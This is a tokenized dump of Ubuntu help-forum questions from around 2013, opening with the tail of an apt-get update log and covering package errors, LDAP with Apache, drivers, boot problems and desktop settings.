] get:25 http : //archive.ubuntu.com raring-updates/universe i386 packages [ 94.2 kb ] get:26 http : //archive.ubuntu.com raring-updates/multiverse i386 packages [ 1,403 b ] ign http : //archive.ubuntu.com raring/main translation-en_us ign http : //archive.ubuntu.com raring/multiverse translation-en_us ign http : //archive.ubuntu.com raring/restricted translation-en_us ign http : //archive.ubuntu.com raring/universe translation-en_us ign http : //archive.ubuntu.com raring-updates/main translation-en_us ign http : //archive.ubuntu.com raring-updates/multiverse translation-en_us ign http : //archive.ubuntu.com raring-updates/restricted translation-en_us ign http : //archive.ubuntu.com raring-updates/universe translation-en_us ign http : //archive.ubuntu.com raring-security/main translation-en_us ign http : //archive.ubuntu.com raring-security/multiverse translation-en_us ign http : //archive.ubuntu.com raring-security/restricted translation-en_us ign http : //archive.ubuntu.com raring-security/universe translation-en_us ign http : //archive.ubuntu.com raring-proposed/main translation-en_us ign http : //archive.ubuntu.com raring-proposed/multiverse translation-en_us ign http : //archive.ubuntu.com raring-proposed/restricted translation-en_us ign http : //archive.ubuntu.com raring-proposed/universe translation-en_us ign http : //archive.ubuntu.com raring-backports/main translation-en_us ign http : //archive.ubuntu.com raring-backports/multiverse translation-en_us ign http : //archive.ubuntu.com raring-backports/restricted translation-en_us ign http : //archive.ubuntu.com raring-backports/universe translation-en_us err http : //extras.ubuntu.com raring/main translation-en_us something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) err http : //extras.ubuntu.com raring/main translation-en something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) err http : //extras.ubuntu.com raring/main sources something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) err http : //extras.ubuntu.com raring/main i386 packages something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) fetched 568 kb in 8min 0s ( 1,181 b/s ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/raring/release.gpg something wicked happened resolving 'archive.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/raring-updates/release.gpg something wicked happened resolving 'archive.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg something wicked happened resolving 'dl.google.com : http ' ( -11 - system error ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/i18n/translation-en_us something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/i18n/translation-en something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/source/sources something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/binary-i386/packages something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) e : some index files failed to download . they have been ignored , or old ones used instead .
310132	how is software updater installing updates without my password ?	i 've noticed software updater in 12.10 installs updates without asking for my password the way it used to . my question is , how is it doing this and what is to prevent a malicious script/program using the same technique executing privileged commands without my password or in fact without me even knowing ?
310133	how to use pulseaudio to detect name of media player ?	i am new to the pulse audio system.i want design application which required show name of media player which currently playing audio or video like play tab shows in the pavucontrol ( pulseaudio volume control ) . i read the pulse audio api documentation on doxygen ( http : //freedesktop.org/software/pulseaudio/doxygen/index.html ) but i do n't get it . please help me ... .
310135	what is an extended partition for ? is it comes by default when ubuntu installed via a cd ?	what an extended partition is for ? is it comes by default when ubuntu installed via a cd ? if not why i see an extended partition in my ubuntu 12.04 os ? thank you .
310139	apache & ldap authentication	i am in the process of merging two ldap directories to one server . to start with i 've created a ldap server with two forests , one for each of the old servers . this went well . now i am trying to setup access to my mediawiki so that users from both forests can access it . i know from ad that it is possible distinguish users with a domain and username either as domain\username or username @ domain is this possible with ldap ? i 've been trying different settings in my site-configuration without any luck . i 've enabled the following modules in apache : core_module ( static ) log_config_module ( static ) logio_module ( static ) mpm_prefork_module ( static ) http_module ( static ) so_module ( static ) alias_module ( shared ) auth_basic_module ( shared ) authn_alias_module ( shared ) authn_file_module ( shared ) authnz_ldap_module ( shared ) authz_default_module ( shared ) authz_groupfile_module ( shared ) authz_host_module ( shared ) authz_user_module ( shared ) autoindex_module ( shared ) cgi_module ( shared ) deflate_module ( shared ) dir_module ( shared ) env_module ( shared ) ldap_module ( shared ) mime_module ( shared ) negotiation_module ( shared ) php5_module ( shared ) reqtimeout_module ( shared ) rewrite_module ( shared ) setenvif_module ( shared ) ssl_module ( shared ) status_module ( shared ) and my site configuration is : < ifmodule mod_ssl.c > < authnprovideralias ldap ldap-grid > authldapbinddn cn=admin , dc=grid , dc=aau , dc=dk authldapbindpassword *** authldapurl ldap : //harald:389/ou=people , dc=grid , dc=aau , dc=dk ? uid ? sub ? ( objectclass=* ) < /authnprovideralias > < authnprovideralias ldap ldap-es > authldapbinddn cn=admin , dc=es , dc=aau , dc=dk authldapbindpassword *** authldapurl ldap : //harald:389/ou=people , dc=es , dc=aau , dc=dk ? uid ? sub ? ( objectclass=* ) < /authnprovideralias > < virtualhost *:443 > servername aggersborg.grid.aau.dk serveradmin adm @ grid.aau.dk documentroot /opt/wiki < directory / > options followsymlinks allowoverride none redirectmatch ^/ $ /wiki/ redirect /observium https : //aggersborg.grid.aau.dk:8080 < /directory > < directory /opt/wiki/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all authbasicprovider ldap-grid ldap-es authname `` aau hpc wiki '' authtype basic authzldapauthoritative off require valid-user < /directory > ... is there a way to allow multiple ldap bases to login to my wiki ?
310140	use results of find command to call vi	is there a way that i can pipe the output of this command ( assuming there is only one file found ) to vi . i want to find this command , and then call it up in vi . thanks . find . -name 'id.properties'
310144	how do i completely uninstall and old version of redis ?	i 'm trying to upgrade to redis version 2.6.13 and i want to remove all old versions on my ubuntu 12.04 system .
310147	what happened to dconf/nautilus `` show-advanced-permissions '' in 13.04 ?	when using nautilus and right-clicking on a file > properties , user is presented with a permissions tab . the default ui for this permissions tab is horribly difficult to understand and calibrate and lacks any sort of user-friendliness . accordingly , i need nautilus to display the alternate view : what has always been called `` advanced-permissions '' view . here is what the `` advanced-permissions '' look like : using dconf editor i have always been able to go to setting dconf-editor > org > gnome > nautilus > preferences > show-advanced-permissions and change the appearance of the permissions to this `` advanced '' presentation which makes the permissions much easier to understand and calibrate . so how do i get nautilus to display what has always been called `` show-advanced-permissions '' ? why is this setting missing from 13.04 ? how do i get it back ?
310149	how to change password of an enrypted ubuntu user account ?	i changed my ubuntu user password using : $ sudo passwd now when i reboot and login using the new password , following warning is displayed : signature not found in user keyring perhaps try the interactive 'ecrypt-mount-private' also $ ls command shows only these 2 dir : access-your-private-data.desktop and readme.txt i tried to start the graphical interface using : $ startx but recieved the following error : timeout in accessing locking authority file /home/my_username ( aman ) /.xauthority i remember my old and new passwords but forgot the passphrase , so retrieved it using : $ ecryptfs-unwrap-passphrase /home/aman/.ecryptfs/wrapped-passphrase after this i 'm not able to make out how to proceed and login to my home foler in graphical interface .
310151	how to change account profile picture ?	i ca n't believe i have to ask this ... but , how do i change my account profile picture in ubuntu 12.04 desktop ? one would think it would be under the `` user accounts '' section .
310153	how do i get maas and juju to recognize proxy settings in a deployment ?	so , i have ubuntu 12.04 lts , installed maas from the initial bootup , and then added juju . i 'm behind a proxy , so , added proxy to /etc/apt/apt.conf and also to /etc/wgetrc . doing that i could then use maas-import-pxe-files . setup my environment , everything seems fine , but when i boot the nodes up they ca n't resolve archive.ubuntu.com . is there somewhere i have to set my proxy information so it 's passed onto the nodes that connect to the maas server ? i do n't see any action in any squid logs , and not sure where i should put my proxy to the outside world so it should be passed on . any assistance is greatly appreciated !
310157	install ubuntu with windows-7	how to install ubuntu without removing my pre-installed windows-7 , my system is 64 bit system .
310164	auto-start upstart user jobs on boot	i 've enabled upstart user jobs and configured a few jobs . these jobs can be started/stopped by the respective user and all is well . however the start on stanza does n't seem to have effect : start on runlevel [ 2345 ] everytime the system is rebooted , i 'd have to ssh into the machine and start [ job name ] . how can i force the system to also start those user jobs ?
310168	simultaneous output with paprefs no more working on ubuntu 13.04	i was using at the same hdmi audio output and laptop built-in speakers , by means of a virtual output device created by paprefs . this was working on 12.10 and no more on 13.04 . on 13.04 , the 'virtual device ' only activates the last selected actual output device . my laptop is dell xps 14 . any suggestion ? thanks ! pier
310170	install ubuntu 13.04	all my life i use windows . i saw a freind using ubuntu . it 's my first time in ubuntu and i 'm looking for a tutorial : what should i do after install ubuntu 13.04 ? thanks for your help . best regards
310172	how to add accounts to friends-app in ubuntu touch ?	when i opened the friends-app in ubuntu touch , it says : setup accounts no online accounts configured , you can add one in system settings doing a quick search on google and askubuntu i do n't figure out how to add accounts by command line , since the ubuntu touch does n't have a system settings for account in the user interface yet . how to add accounts ?
310175	unable to finish the instalation ( or run ) ubuntu 12.04 from usb dive	i made an usb drive with ubuntu-12.04.2-desktop-amd64.iso . i start the instalation and after some minutes the pc stops and the usb drive is no more read . the usb drive is correctly made since i tried it on an another pc and works very well , in both mode ( run without instal , and with instal ) . i do not have any protection in the hdd or bios . the pc is an dell latitude e6430 what is the problem ?
310176	apache 2.4 for production enviroment	i have installed the latest version of apache i.e . 2.4 on my ubuntu 12.04 that is not yet available on the ubuntu 's official repository . i dont know how but it is installed in /usr/local/apache2 but the issue is i want to know should i use apache 2.4 for my production enviroment . my production server also runs on ubuntu server edition . will it cause problems like compatibility issues ? or should i go with the older version of apache server . please help .
310180	how to share files using a wireless network ?	i have a desktop ( ubuntu 13.04 & win 7 home premium ) and a laptop ( ubuntu 12.04 ) , both having wifi adapters . i also have a wifi router connected to internet which both my computers can access . i want to share files between my desktop and my laptop using wifi ( similar to homegroup on windows 7 but without using ethernet cables ) . how do i set-up that ? i want to share files using both oss , if anyone have have information about sharing files with any of the os please answer !
310182	does the length of a filename change the amount of space it takes up ?	using a ext3 or ext4 file system , assuming that the files have similar checksums , would the following files : 8c87dba9cf4dbc27c0d54083311ffeef6821e8426f5a8d50165d84f5eef80103.npz 1.npz take up a different amount of space on the hd ? i have many ( 10 to 100 's of thousands ) of these files so a difference , however small , would be worth knowing about .
310185	how do i change the permissions of a system file on every login ?	i need to make a system file writable without using sudo so i typed : sudo chmod 646 /path/to/file it workedâś âśuntil i rebooted , because the file is recreated on every boot . how do i change the file permissions on every boot ?
310189	not dual booting with ubuntu linux 12.04 lts	after installing ubuntu linux 12.04 lts ( from cd ) side by side with windows 7 , why am i not getting dual boot ? each time i restart or shut down my laptop , windows 7 automatically loads . what to do ? i can not see any bootloader that pops up each time i restart or shutdown . thank you . your help is appreciated .
310190	can scan with simple scanner in epson stylus 525wd	i 'm using ubuntu 13.04 and i need my epson to scan something . i ca n't , however , find a way to make it work . using the `` simple scan '' app , it says `` can not connect to device '' , as if no scan was connected to it . the model of the printer is the following : epson stylus 525wd
310191	find application name	i 'm looking for a way to find e.g . the command name for an application that does appear in the dash . more specifically : i installed the game costume quest ( from the double fine humble bundle ) , and more recently wanted to uninstall it . so i uninstalled it through the software center . however , the application still runs , even though the software center tells me it 's not there . so i wanted to uninstall it through the command line , but i do n't know the package name , or command name . it appears through the dash when i search `` costume quest '' , it will run when i click the icon in the dash , but i ca n't seem to find any file or folder that may give me a hint for the command/package name . i 'm running 13.04 , will say more about the hardware if it turns out to be relevant .
310192	how to control order of device loading during startup ?	i am running ubuntu 13.04 on a lenovo thinkpad e420s . i am having a problem with the timing of device loading during startup . i assume this was always happening , but i did not realize it was an issue until i switched to an ssd and my system began starting up much quicker . the primary issue is that the trackpoint does not get loaded until well after the desktop loads . this means that i am left with an unresponsive cursor , unless i use the touchpad or an external mouse . here is the relevant part of the dmesg output ( the whole thing is at http : //pastebin.com/ys5jed8s ) : [ 10.969765 ] init : anacron main process ( 1305 ) killed by term signal [ 11.055177 ] init : plymouth-stop pre-start process ( 1934 ) terminated with status 1 [ 15.895979 ] cifs vfs : error connecting to socket . aborting operation [ 15.896051 ] cifs vfs : cifs_mount failed w/return code = -101 [ 16.372336 ] cifs vfs : error connecting to socket . aborting operation [ 16.372429 ] cifs vfs : cifs_mount failed w/return code = -101 [ 19.313093 ] device-mapper : ioctl : unable to rename non-existent device , cryptswap1_unformatted to cryptswap1 [ 19.415130 ] show_signal_msg : 51 callbacks suppressed [ 19.415136 ] empathy [ 2481 ] : segfault at 0 ip ( null ) sp 00007fff9e299128 error 14 in empathy [ 400000+40000 ] [ 20.596623 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.0 , id : 0x1e2b1 , caps : 0xd001a3/0x940300/0x120c00 , board id : 1719 , fw id : 783906 [ 20.596630 ] psmouse serio1 : synaptics : serio : synaptics pass-through port at isa0060/serio1/input0 [ 20.681736 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input11 [ 26.222684 ] psmouse serio2 : alps : unknown alps touchpad : e7=10 00 64 , ec=10 00 64 [ 32.464680 ] psmouse serio2 : trackpoint : ibm trackpoint firmware : 0x0e , buttons : 3/3 [ 32.887796 ] input : tpps/2 ibm trackpoint as /devices/platform/i8042/serio1/serio2/input/input12 as you can see , the trackpoint is not loaded as a device until over 30 seconds after boot . is there anyway to change this loading order , or to explicitly load the trackpoint so it becomes responsive sooner ?
310196	how can i figure out what polkitd is doing with so much of my system 's resources ?	i 'm running 13.04 on an acer c7 ( chrubuntu 12.04 install then two system upgrades ) and now whenever i use my computer for more than a few minutes , it slows down as polkitd , dbus-daemon , console-kit-daemon , and networkmanager chew up all my system resources . i tried googling this issue but it does not seem to be very widespread , or i 'm just missing something . i 've tried looking at my system logs but nothing seems especially unusual there . i 've also tried looking at the dbus-monitor . i 'm not completely sure what i 'm looking for there , but there does not seem to be a constant stream of activity . is there some other way to see what polkitd and / or these other processes are going ? i would also appreciate any thoughts on how to fix this issue . thanks !
310197	how to automatically add ' & ' after each command in a terminal	i use guake as a sort of `` run '' command , because my lxde launcher often misbehaves . so i just enter the command line in guake followed by & ( so i get back the control of the console ) . is there a way to configure the terminal to automatically append & to all the commands i enter , or any other way to make it behave like i am adding & sign to my commands
310210	apt-get hang at rsyslog	when i try to install something , there is a hang , i do n't know if it 's a bug or something else ... root @ computer : ~ # apt-get install reading package list ... done building dependancy tree reading state information ... done the following package has been automatiquelly installed but are n't necessary : libtext-glob-perl libfile-find-rule-perl libnumber-compare-perl please use âť apt-get autoremove âť to remove them 0 upgraded , 0 newly installed , 0 to remove . paramating rsyslog ( 5.8.6-1ubuntu8.3 ) ... skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd and it 's hanging there . i let it run for more then 15 minutes , i had to stop it ( crtl+c ) . anyone has an idea of how to fix it and/or what may be the cause ? thx ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - after trying what ilya semenov proposed to do : run ps afx|grep rsyslog in a different console , then : if there are traces of rsyslogd running , probably in < defunct > state , this is a bug in the upstart scripts incompatibility which has been fixed . simply upgrade to the recent version ( dpkg -r -- ignore-depends rsyslog rsyslog & & aptitude update & & aptitude upgrade rsyslog ) . if there are no traces of rsyslogd running , and the only related process that hangs is start rsyslog , you need to reboot ( and then perhaps continue with step 1 ) . it does n't seem to work . at first i did the ps afx : root @ computer : ~ # ps afx | grep rsyslog 11860 pts/3 s+ 0:00 _ grep -- color=auto rsyslog 1056 ? ss 0:00 rsyslogd -c5 3681 pts/4 ss+ 0:00 _ /usr/bin/dpkg -- status-fd 65 -- configure rsyslog : i386 3682 pts/4 s+ 0:00 _ /bin/sh /var/lib/dpkg/info/rsyslog.postinst configure 5.8.6-1ubuntu8.2 3779 pts/4 s+ 0:00 _ /bin/sh /usr/sbin/invoke-rc.d rsyslog restart 3795 pts/4 s+ 0:00 _ /bin/sh -e /etc/init.d/rsyslog restart 3806 pts/4 s+ 0:00 _ start rsyslog i was n't able to use dpkg because it was locked , so i rebooted . root @ computer : ~ # ps afx | grep rsyslog 3726 pts/2 s+ 0:00 _ grep -- color=auto rsyslog 1067 ? ss 0:00 rsyslogd -c5 then i suppressed rsyslog , but it stalled again while doing the suppression : root @ pt-l-00258 : ~ # dpkg -r -- ignore-depends rsyslog rsyslog suppressing rsyslog ... i waited for 5 minutes ... then i canceled the process ( ctrl+c ) ^cdpkg : error in the process rsyslog ( -- remove ) : interruption of the sub-process script pre-removal installed again , i waited for 5 minutes ... ^cdpkg : error while cleaning up : interruption of the sub-process script pre-removal installed error have been seen during the process : rsyslog root @ computer : ~ # any new idea ? thx for your answer : )
310217	workspace 1 to laptop screen and workspace 2 on hdmi connected tv ?	i have two workspaces , which i need to function as below : usually they function as usual two workspaces , but ... when i connect a hdmi cable to my system i want to have workspace 1 display on laptop screen and be workable with keyboard and touchpad inputs as usual . while in the background , i want to display workspace 2 content on the tv connected through the hdmi cable . how can i get this done ? ? ? preferably without compiz involvement .
310219	how do i change my username ?	my first name is lluis but always ubuntu changes my name as llus when my computer starts as ubuntu . i do n't understand why this 'i ' is missed .
310220	freegate in ubuntu	it 's possible to use freegate ( for surfing the web anonymously ) in ubuntu 13.04 ? is it possible to use wine for this purpose ? would it work really ?
310225	kde no longer available on kubuntu instead boots gnome	my laptop ran out of power and died on me . now it no longer boots into kde and is not available in the session list . any idea on what to do ? kinda of a nub with linux .
310232	citrix reciever 12.1 on ubuntu 13.04 64-bit	i am following the installation instructions for the citrix receiver 12.1 on ubunti 13.04 64 bit . the nspluginwrapper tells me to install the nspluginviewer , which is only availaable in 32 bit . when i try to install this i get the message that i need libc6 > = 2.15 but if i try to install these using apt-get the system tells me they are already installed with a later version than 2.15 . what have i done wrong ?
310233	ca n't find skype package through software center - apt-get , canonical partners ' box uncheckable	i did a fresh install of ubuntu 12.04 lts on my computer.one of the first things i wanted to do was to install skype . however i could not find skype in the software center.and when i tried to install it through terminal , this was the output : paris @ paris-pc : ~ $ sudo apt-get install skype [ sudo ] password for paris : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package skype paris @ paris-pc : ~ $ so i thought that the source for the skype package might not be enabled as a repository source for the system , so i went to software center- > edit- > other software tab and tried to check the box of canonical partners > this is the message i get : forbidden you do n't have permission to access /1350682854.png on this server . apache/2.2.15 ( centos ) server at imagebin.ubuntu-gr.org port 80 please help .
310234	what is the name of the the live-cd installer ?	i am trying to install xubuntu from a live-cd but when i click the icon on the desktop to install nothing happens . how can i start that installer from the console ?
310242	error in installation directory	i 'm trying to install my first linux package ... what an oddysey . after finding out what sudo is and sense what make file does , and losing a lot of time on the internet , i 'm about to quit ... hopefully i can get some help here . untar change to uncompressed folder and search furiously to find out how to install things in linux download g++ ; i do n't know why it no longer comes with the distro : ( . read readme open a console ( ubuntu ! a direct access to the console ! ) and type make dep type on the console make type on the console make install -- -- > error ( superuser ? this is like windows vista -- not to desperate ) type on the console sudo make install -- -- > error covrita @ covrita-lenovo-b580 : /media/covrita/ubuntu/nueva2/picprog-1.9.1 $ sudo make install [ sudo ] password for covrita : install -c -o 0 -g 0 -m 755 picprog /usr/local/bin/ install -c -o 0 -g 0 -m 644 *.1 /usr/local/man/man1/ install : el objetivo âť/usr/local/man/man1/âť no es un directorio : no existe el archivo o el directorio make : *** [ install ] error 1
310247	compiz high cpu	i recently installed ubuntu 13.04 ( my first linux ) alongside windows 7 . when i booted for the first time and ever since compiz is eating up my cpu . when idle and doing nothing window management related , compiz keeps at 1-3 % . but when opening programs or moving them , everything slows down and compiz eats up my cpu ( sometimes up to 200 % ) i collected some info ( but i 'm new to linux , so i ca n't make anything of it ) : here are some files ( hope it works : ) ) : https : //drive.google.com/folderview ? id=0byqbt-gs2jarqzlis3dgufi5t28 & usp=sharing -details : details about my system -lspci : output of lspci -syslog : copy of my syslog -compiz restart crash & compiz crash : i restarted compiz with compiz -- replace ccp , it crashed and this is the output in the terminal -xorg.0.log : copy of file with same name ; xorg also takes some cpu power : usually 1-5 % is it possible compiz is running on my cpu , rather than my gpu ? and , as it says 'unity not supported by your hardware ' and 'using software rendering ' , is it my gpu or drivers not working ? ( i installed none , btw ) thanks in advance for any help !
310254	no internet connection in firefox , must end process and restart	firefox works fine for a while then slows down until there 's no internet connection at all . after closing firefox and restarting ( after i had to end process in system monitor ) internet works fine again . i 've tried with reinstalling it again and making new profile , did n't help . ubuntu 12.04 lts
310258	ssl missing from python . 'module ' object has no attribute 'httpsconnection '	my main issue is that httplib module of python is missing httpsconnection . when i try to use pip to install fabric using pip it gives me this error : 'module ' object has no attribute 'httpsconnection' i used easy_install and it worked for the most part but it also threw an error : download error : unknown url type : https -- some packages may not be found ! this was my procedure for installing python2.7 sudo apt-get install build-essential sudo apt-get install libreadline-dev libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev wget http : //www.python.org/ftp/python/2.7.5/python-2.7.5.tgz tar 窶度vf python-2.7.5.tgz cd python-2.7.5 ./configure -- enable-shared -- prefix=/usr -- sysconfdir=/etc make sudo make altinstall installed setuptools : wget https : //pypi.python.org/packages/2.7/s/setuptools/setuptools-0.6c11-py2.7.egg # md5=fe1f997bc722265116870bc7919059ea sudo sh setuptools-0.6c11-py2.7.egg installed pip : curl -o https : //raw.github.com/pypa/pip/master/contrib/get-pip.py sudo python get-pip.py
310261	ralink rt5360 wireless not working	i have built myself a new server/pc . i happened to installed a wifi card that was not supported by ubuntu 12.04 lts , so i found drivers that worked and all was good for some time . after the kernel update i rebuilt the drivers with no success , so i ran the live cd of 13.04 and the wifi worked cool . i then did the upgrade to 12.10 and finely to 13.04 but the wifi is still not working . any suggestions ? lspci network controller : ralink corp. rt5360 wireless 802.11n 1t/1r sudo lshw -c network *-network unclaimed description : network controller product : rt5360 wireless 802.11n 1t/1r vendor : ralink corp. physical id : 6 bus info : pci @ 0000:03:06.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=32 maxlatency=4 mingnt=2 resources : memory : fd3f0000-fd3fffff
310263	how to fix git autocomplete in 13.04	in previous version 12.10 when using git from command line autocomplete of commands , branches , tag ... worked . after installing fresh 13.04 and git it does not work . what to set up to make it work again ? edited git is installed using apt-get install git . when i enter : git i and press tab nothing happens . 'init ' is not completed
310266	how to download skyrim from steam and play on ubuntu	i recently bought skyrim on steam and did not know that it can only be played on windows . i was wondering how can i play skyrim on my ubuntu computer ?
310267	ubuntu 13.04 boots and starts up slowly	after i updated from ubuntu 12.10 to 13.04 my operating system is very slow . until i see the login screen it takes very long and after logging in i wait for about a minute ... i have dual boot with windows 8 ( for visual studio only ) my laptop 's configuration is : lenovo b570 cpu i3-2330 2.20ghz ram 6gb hdd 500gb vga intel hd 3000 ( driver installed ) swap 4gb ubuntu 64bit
310268	how do i get my shell prompt back after using gedit from the terminal ?	i 'm trying to update my apt sources list in terminal by using gedit . my question is once i reach this point i need the command prompt `` root @ bt : /ect/apt # '' back . the line is just blank . how do i recall this line of code ? root @ bt : ~ # cd root @ bt : ~ # cd /etc/apt/ root @ bt : /etc/apt # ls apt.conf.d sources.list sources.list.d trusted.gpg preferences.d sources.list~ sources.list.save trusted.gpg~ secring.gpg sources.list.bt trustdb.gpg trusted.gpg.d root @ bt : /etc/apt # gedit sources.list i have tried googling this and i also checked the help file and i cant find anything on this . any help would be appreciated .
310269	new to ubuntu , want to rename files , but how ?	we have a new computer and i love the ubuntu design , but the code-stuff is a bit hard for me ... so here is my question : i just downloaded something from youtube and converted it to an mp3 . i have last.fm , that is a site that connects between the media player and the site , and it stores your listening history . when i play my song it says `` unknown artist '' . when i go to my downloads , the song and then properties and click on audio i can not change a thing ! how can i change the title , artist and all that other stuff ? the answers that i think i found are with all these weird codes and i do n't even know if that is the solution for my `` problem '' .. thanks for responding !
310273	ubuntu not loading/running correctly	when i boot up i get just my desktop background , no menus or options . i can access terminal through recovery mode , but everything i try fails because of a missing package or something . i just updated from 11.10 to 12.04 lts , but i would really just like to reinstall with 13.04 . is there a way to do this from terminal/command line ?
310286	package broken , software only partially updates	i have an issue i ca n't download anything , it says the package is broken but when i deleted the packages , it now only partially upgrades things , and even then it does n't work ! ! ! this is what it says : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed linux-image-3.8.0-19-generic linux-image-extra-3.8.0-19-generic 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 123 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 287875 files and directories currently installed . ) removing linux-image-extra-3.8.0-19-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic update-initramfs : deleting /boot/initrd.img-3.8.0-19-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : uvesafb : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.8.0-19-generic.postrm line 328. dpkg : error processing linux-image-extra-3.8.0-19-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports has already been reached removing linux-image-3.8.0-19-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic update-initramfs : deleting /boot/initrd.img-3.8.0-19-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : uvesafb : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.8.0-19-generic.postrm line 328. dpkg : error processing linux-image-3.8.0-19-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports has already been reached errors were encountered while processing : linux-image-extra-3.8.0-19-generic linux-image-3.8.0-19-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am running ubuntu 13.04 32 bit . please be nice , i am a new to this ...
310289	remove ubuntu 10.10 without affecting ubuntu 12.04 in the same hard drive	i installed 10.10 to try the macbuntu theme ( evidently enough , it did n't work ) . i am trying to uninstall it , but i also have 12.04 on the same hard drive . how would i go about removing 10.10 without affecting 12.04 ? thanks !
310295	how to upgrade from ubuntu 8.04 lts to the latest more compatible version	i am not very knowledgable on ubuntu in general but for the past few days i have been getting a bit of knowlege here and there . at first this desktop was only set to turn on and run in â¨terminal '' mode like cmd black and white , but since this computer runs and comunnicates with our other software found in different computers we needed to have a gui which after some research i was able to installand now i find out it is called gnome . anywho , while i was exited that i was able to get it this far found out that this is running an old version ubuntu 8.04 lts hardy heron . it is prompting me to do tons of updates and suggesting to upgrade to 10.04.3 lts i wouldnt mind to do so but would the upgrade damage or delete the files and software it has to communicate with our other software/servers ? thanks in advance !
310301	steam not running	i have just installed steam but when i double click on the icon , it does nothing . if i try to start steam from the terminal i get this : this is what it says : jonathon @ bacage : ~ $ steam running steam on ubuntu 12.04 32-bit steam_runtime is enabled automatically /home/jonathon/.local/share/steam/steam.sh : line 704 : 5275 illegal instruction $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' installing bootstrap /home/jonathon/.local/share/steam/bootstrap.tar.xz running steam on ubuntu 12.04 32-bit steam_runtime has been set by the user to : /home/jonathon/.local/share/steam/ubuntu12_32/steam-runtime /home/jonathon/.local/share/steam/steam.sh : line 704 : 5361 illegal instruction $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' any ideas ?
310311	how can drivers for nvidia graphics cards be installed on ubuntu 13.04 without messing up the os ?	i am running ubuntu 13.04 on a 2011 dell xps l501x laptop : intel core i5 , nvidia geforce gt 420m graphics card , 6gb ram , etc . i had no problems during normal computing , however , after installing and attempting to play minecraft on the machine . extreme lag led me to investigate things , as this was not a problem with windows . i learned that the ubuntu os does not seem to recognize my graphics card , and instead mentions intel ironlake graphics under my system information . after not finding any appropriate driver downloads on the nvidia site , i followed the instructions given on http : //www.noobslab.com/2012/10/install-latest-nvidia-drivers-in-ubuntu.html . after restarting my computer , i was able to log into my account , but then all that was displayed was my desktop background image . i tried unsuccessfully to fix the problem using some of the instructions provided in the comments on that site , and the end had to reinstall ubuntu 13.04 . after putting all of my documents , software , etc . back on the computer , i tried to install the nvidia drivers via the package available in the software center , once again unsuccessfully . i have now reinstalled ubuntu 13.04 a third time , and am wondering how i can install these drivers , if there is a way , without messing up the os . i am semi-literate with linux , and would appreciate help . thanks !
310312	how to configure geany to wrap lines ?	when coding with geany , i often have quite long lines . i want them to wrap automatically , so that i don`t have to scroll horizontally to see what i 've written .
310316	can snap-windows be set up for 4 windows instead of just 2 ?	the title might need some adjusting but what i am trying to say is that , when one drags a window to the left or right side of the screen , it resizes to fill that half of the screen . so if i drag 2 windows , one to the left and one to the right , i can have to 2 windows that use the whole screen and do not overlap . for example , for cases where i want to explain about web programming and on one window i have the code and on the other i have the web browser . now , what if i wanted to have 4 instead of 2 . one window would resize to take the top-left , the other the top-right , then 2 more would take the bottom-left and bottom-right . all of this would take those positions if i dragged them to their respective corners ( eg : the top-left window would resize to that position if i drag it to the top-left corner of the screen , the bottom-right would resize to that position if i drag it to the bottom-right corner of the screen ) . so how can i add 2 more positions so unity handles all of this 4 positions instead of only 2 ?
